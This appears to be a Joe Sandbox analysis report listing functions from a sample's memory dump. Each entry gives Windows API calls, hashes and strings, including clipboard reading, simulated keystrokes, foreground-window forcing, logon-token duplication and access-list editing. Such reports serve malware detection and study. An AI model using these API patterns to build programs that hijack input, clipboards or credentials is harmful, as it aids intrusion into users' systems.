Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: d76f0f7d9c9ea178c829ccde00ec2685fa21c4e16e64ca5c0683a0fadcd89ca8
Instruction ID: 93877461de5c48076c2c6392766cfe5d407b98c6dcc8ebedd2688874c4a144a1
Opcode Fuzzy Hash: d76f0f7d9c9ea178c829ccde00ec2685fa21c4e16e64ca5c0683a0fadcd89ca8
Instruction Fuzzy Hash: 06E0CD726041245BCB10A2589C09FEA77EDEFC8790F050072FD09D7348DA64AD808551

Function 007D2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 007D3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007D3908

Part of subcall function 007DD730: GetInputState.USER32 ref: 007DD807

SetCurrentDirectoryW.KERNEL32(?), ref: 007D2B6B

Part of subcall function 007D30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 007D314E

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: d1487c484b1293ad88fec0911e3340d1773ccda72a64ce2fee176380e47c0d62
Instruction ID: 80d8a7b6c20ae0bbb4c4b06ae293710d5172ec970c78ce1211a11f69c34c19e6
Opcode Fuzzy Hash: d1487c484b1293ad88fec0911e3340d1773ccda72a64ce2fee176380e47c0d62
Instruction Fuzzy Hash: 20E0862170424486CA04BB75A85E57DA77AABD6751F40153FF14283363DE6D494A4262

Function 00833D03 Relevance: 1.5, APIs: 1, Instructions: 18windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00833D18

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageSendTimeout
String ID:
API String ID: 1599653421-0
Opcode ID: 4348fef17bc8dc3d0c8e112d428124542974563a961d31e7cca1610a2a6f4109
Instruction ID: 1c218f0e42fbab90ddaf816f88aa24e2b8daa5e08eea1eb788f39ac0030b8810
Opcode Fuzzy Hash: 4348fef17bc8dc3d0c8e112d428124542974563a961d31e7cca1610a2a6f4109
Instruction Fuzzy Hash: 64D012E06A03087EFB0093718C0BEBB329CD326A81F004BA8BA02D64C1D9A0DE080130

Function 0081039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00810704,?,?,00000000,?,00810704,00000000,0000000C), ref: 008103B7

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f289ee89d75701812b911b307ece94b7ffc231af202a0e546d1165aba5990b42
Instruction ID: 8c1ada390269e52d1fc7502bdf92dd0d457f777b3f75f449ca2a5ede14d7afae
Opcode Fuzzy Hash: f289ee89d75701812b911b307ece94b7ffc231af202a0e546d1165aba5990b42
Instruction Fuzzy Hash: 52D06C3204010DBBDF028F84DD06EDA3BAAFB48714F014000FE5856020C772E821AB90

Function 007D1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 007D1CBC

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 80711f163051f31152efb1e592e208704c9156594c7aeff95888007a3c265abb
Instruction ID: ad21e64bed08b3a5ac62a4a57df2c926041ab54aa08cf66781e6196779b1cbe0
Opcode Fuzzy Hash: 80711f163051f31152efb1e592e208704c9156594c7aeff95888007a3c265abb
Instruction Fuzzy Hash: A9C09B352803049FF6144B84BC4EF107754B349B10F045001F649559E3C3E11410DA50

Non-executed Functions

Function 00869576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 007E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 007E9BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0086961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0086965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0086969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008696C9
SendMessageW.USER32 ref: 008696F2
GetKeyState.USER32(00000011), ref: 0086978B
GetKeyState.USER32(00000009), ref: 00869798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008697AE
GetKeyState.USER32(00000010), ref: 008697B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008697E9
SendMessageW.USER32 ref: 00869810
SendMessageW.USER32(?,00001030,?,00867E95), ref: 00869918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0086992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00869941
SetCapture.USER32(?), ref: 0086994A
ClientToScreen.USER32(?,?), ref: 008699AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 008699BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008699D6
ReleaseCapture.USER32 ref: 008699E1
GetCursorPos.USER32(?), ref: 00869A19
ScreenToClient.USER32(?,?), ref: 00869A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00869A80
SendMessageW.USER32 ref: 00869AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00869AEB
SendMessageW.USER32 ref: 00869B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00869B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00869B4A
GetCursorPos.USER32(?), ref: 00869B68
ScreenToClient.USER32(?,?), ref: 00869B75
GetParent.USER32(?), ref: 00869B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00869BFA
SendMessageW.USER32 ref: 00869C2B
ClientToScreen.USER32(?,?), ref: 00869C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00869CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00869CDE
SendMessageW.USER32 ref: 00869D01
ClientToScreen.USER32(?,?), ref: 00869D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00869D82

Part of subcall function 007E9944: GetWindowLongW.USER32(?,000000EB), ref: 007E9952

GetWindowLongW.USER32(?,000000F0), ref: 00869E05

Strings

F, xrefs: 00869D07
@GUI_DRAGID, xrefs: 0086997D

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: 23bed669828f4280526efefe4b8afb4af130c86b80b9c4f7058552c270b0493c
Instruction ID: c525c95453595bd94f38b1f4602081a2d2b42d793b4bab554a3914b5922c0598
Opcode Fuzzy Hash: 23bed669828f4280526efefe4b8afb4af130c86b80b9c4f7058552c270b0493c
Instruction Fuzzy Hash: B8428A34204301AFDB25CF68CC48AAABBE9FF59314F16061DF699C72E1E771A854CB52

Function 007EF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 007EF998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0082F474
IsIconic.USER32(00000000), ref: 0082F47D
ShowWindow.USER32(00000000,00000009), ref: 0082F48A
SetForegroundWindow.USER32(00000000), ref: 0082F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0082F4AA
GetCurrentThreadId.KERNEL32 ref: 0082F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0082F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0082F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0082F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0082F4DE
SetForegroundWindow.USER32(00000000), ref: 0082F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0082F4F6
keybd_event.USER32(00000012,00000000), ref: 0082F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0082F50B
keybd_event.USER32(00000012,00000000), ref: 0082F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0082F519
keybd_event.USER32(00000012,00000000), ref: 0082F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0082F528
keybd_event.USER32(00000012,00000000), ref: 0082F52D
SetForegroundWindow.USER32(00000000), ref: 0082F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0082F557

Strings

Shell_TrayWnd, xrefs: 0082F46F

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 85dc9e210a237490d7d088821b3cf2ac5aecf243287252221f9d6ebd0e1450f1
Instruction ID: 5646bfa8be6ade8438d342914d56a947a78c19cf88c1d8b0aa9b6ac715d27a96
Opcode Fuzzy Hash: 85dc9e210a237490d7d088821b3cf2ac5aecf243287252221f9d6ebd0e1450f1
Instruction Fuzzy Hash: EA315071A40228BAEB206FB5AC4AFBF7E7CFB44B50F111026F741E61D1C6F15940EA64

Function 00831201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 008316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0083170D
Part of subcall function 008316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0083173A
Part of subcall function 008316C3: GetLastError.KERNEL32 ref: 0083174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00831286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 008312A8
CloseHandle.KERNEL32(?), ref: 008312B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008312D1
GetProcessWindowStation.USER32 ref: 008312EA
SetProcessWindowStation.USER32(00000000), ref: 008312F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00831310

Part of subcall function 008310BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008311FC), ref: 008310D4
Part of subcall function 008310BF: CloseHandle.KERNEL32(?,?,008311FC), ref: 008310E9

Strings

default, xrefs: 0083130B
, xrefs: 0083125A
winsta0, xrefs: 008312CC

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: 469033a99ed14c0908710cf6d3fb4af498726a2758fe5ca8a6edfd0950a55f08
Instruction ID: f4aeaafb53e7152c4d48de5faca211e36b1a79760e791d071b173e7925fb953f
Opcode Fuzzy Hash: 469033a99ed14c0908710cf6d3fb4af498726a2758fe5ca8a6edfd0950a55f08
Instruction Fuzzy Hash: B9818B71900208ABDF219FA8DC49FFE7BBAFF44B04F144129F910E62A0CB758944CBA5

Function 00830B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00831114
Part of subcall function 008310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 00831120
Part of subcall function 008310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 0083112F
Part of subcall function 008310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 00831136
Part of subcall function 008310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0083114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00830BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00830C00
GetLengthSid.ADVAPI32(?), ref: 00830C17
GetAce.ADVAPI32(?,00000000,?), ref: 00830C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00830C6D
GetLengthSid.ADVAPI32(?), ref: 00830C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00830C8C
HeapAlloc.KERNEL32(00000000), ref: 00830C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00830CB4
CopySid.ADVAPI32(00000000), ref: 00830CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00830CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00830D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00830D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00830D45
HeapFree.KERNEL32(00000000), ref: 00830D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00830D55
HeapFree.KERNEL32(00000000), ref: 00830D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00830D65
HeapFree.KERNEL32(00000000), ref: 00830D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00830D78
HeapFree.KERNEL32(00000000), ref: 00830D7F

Part of subcall function 00831193: GetProcessHeap.KERNEL32(00000008,00830BB1,?,00000000,?,00830BB1,?), ref: 008311A1
Part of subcall function 00831193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00830BB1,?), ref: 008311A8
Part of subcall function 00831193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00830BB1,?), ref: 008311B7

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 189830ae4e3f93e2bc00f66dda449f318b842e5ea8e7ee2e5e0925f3c8c0d53a
Instruction ID: 103724a3d66a339885514939d7bf3c3650fb586e437dead000d8927085f89a01
Opcode Fuzzy Hash: 189830ae4e3f93e2bc00f66dda449f318b842e5ea8e7ee2e5e0925f3c8c0d53a
Instruction Fuzzy Hash: 57715A7290020AABEF10DFA4DC48FAEBBB8FF45300F154655E954E6291D7B5AA05CFA0

Function 0084EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0086CC08), ref: 0084EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0084EB37
GetClipboardData.USER32(0000000D), ref: 0084EB43
CloseClipboard.USER32 ref: 0084EB4F
GlobalLock.KERNEL32(00000000), ref: 0084EB87
CloseClipboard.USER32 ref: 0084EB91
GlobalUnlock.KERNEL32(00000000,00000000), ref: 0084EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0084EBC9
GetClipboardData.USER32(00000001), ref: 0084EBD1
GlobalLock.KERNEL32(00000000), ref: 0084EBE2
GlobalUnlock.KERNEL32(00000000,?), ref: 0084EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0084EC38
GetClipboardData.USER32(0000000F), ref: 0084EC44
GlobalLock.KERNEL32(00000000), ref: 0084EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0084EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0084EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0084ECD2
GlobalUnlock.KERNEL32(00000000,?,?), ref: 0084ECF3
CountClipboardFormats.USER32 ref: 0084ED14
CloseClipboard.USER32 ref: 0084ED59

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: c307bd9fd2b2a9e14e6335f89a991c583018d0dd86b0e74d8d6cbed36dc3219f
Instruction ID: b53426ed74e5f0e362524acd96c97f46003d66edc4e43e3e1fb128cf9128fe74
Opcode Fuzzy Hash: c307bd9fd2b2a9e14e6335f89a991c583018d0dd86b0e74d8d6cbed36dc3219f
Instruction Fuzzy Hash: 5D61AB34204209AFD300EF24D898F3AB7A4FF84714F15551EF896D72A2CB71E905CBA2

Function 0084698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 008469BE
FindClose.KERNEL32(00000000), ref: 00846A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00846A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00846A75

Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00846AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00846ADF

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00846B6A
%03d, xrefs: 00846DA2
%4d, xrefs: 00846BB1
%02d, xrefs: 00846C00, 00846C0A, 00846C5A, 00846CAA, 00846CFA, 00846D4A
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00846B32

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: b27befc8d4e29dec2891b9c0ea8cd6cf67f7810cdbef6ede8ede2add42447e00
Instruction ID: d82306a28d6926f72862be9a9677258fa18c941fff84799aa02ae6e91d051ac6
Opcode Fuzzy Hash: b27befc8d4e29dec2891b9c0ea8cd6cf67f7810cdbef6ede8ede2add42447e00
Instruction Fuzzy Hash: 0ED150B2508344AEC714EBA4C895EABB7FCFF88704F44491EF585D6291EB78DA04C762

Function 00849642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00849663
GetFileAttributesW.KERNEL32(?), ref: 008496A1
SetFileAttributesW.KERNEL32(?,?), ref: 008496BB
FindNextFileW.KERNEL32(00000000,?), ref: 008496D3
FindClose.KERNEL32(00000000), ref: 008496DE
FindFirstFileW.KERNEL32(*.*,?), ref: 008496FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0084974A
SetCurrentDirectoryW.KERNEL32(00896B7C), ref: 00849768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00849772
FindClose.KERNEL32(00000000), ref: 0084977F
FindClose.KERNEL32(00000000), ref: 0084978F

Strings

*.*, xrefs: 008496F5

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 1585ffd394a8cbacaf9cd5d27d00e9914be86182e467451c7f60f5b6052147a8
Instruction ID: cd4314392261b4cca704d1101cd47691404a92c0ce1c8b3ece1e3622bd890ccd
Opcode Fuzzy Hash: 1585ffd394a8cbacaf9cd5d27d00e9914be86182e467451c7f60f5b6052147a8
Instruction Fuzzy Hash: FF31BE3260121DAEDB20AFB4DC08AEF77ACFF09320F154156E995E22A0EB74DE408B14

Function 0084979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 008497BE
FindNextFileW.KERNEL32(00000000,?), ref: 00849819
FindClose.KERNEL32(00000000), ref: 00849824
FindFirstFileW.KERNEL32(*.*,?), ref: 00849840
SetCurrentDirectoryW.KERNEL32(?), ref: 00849890
SetCurrentDirectoryW.KERNEL32(00896B7C), ref: 008498AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 008498B8
FindClose.KERNEL32(00000000), ref: 008498C5
FindClose.KERNEL32(00000000), ref: 008498D5

Part of subcall function 0083DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0083DB00

Strings

*.*, xrefs: 0084983B

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 9740847897e90eecb44911e1d68df71fe54ef2dac6ff67280d3d2f86ab9d26d3
Instruction ID: a310d3de365d9f1ae1954d16c5fcda688ce26a7568089720c76b5ffa093ad1c2
Opcode Fuzzy Hash: 9740847897e90eecb44911e1d68df71fe54ef2dac6ff67280d3d2f86ab9d26d3
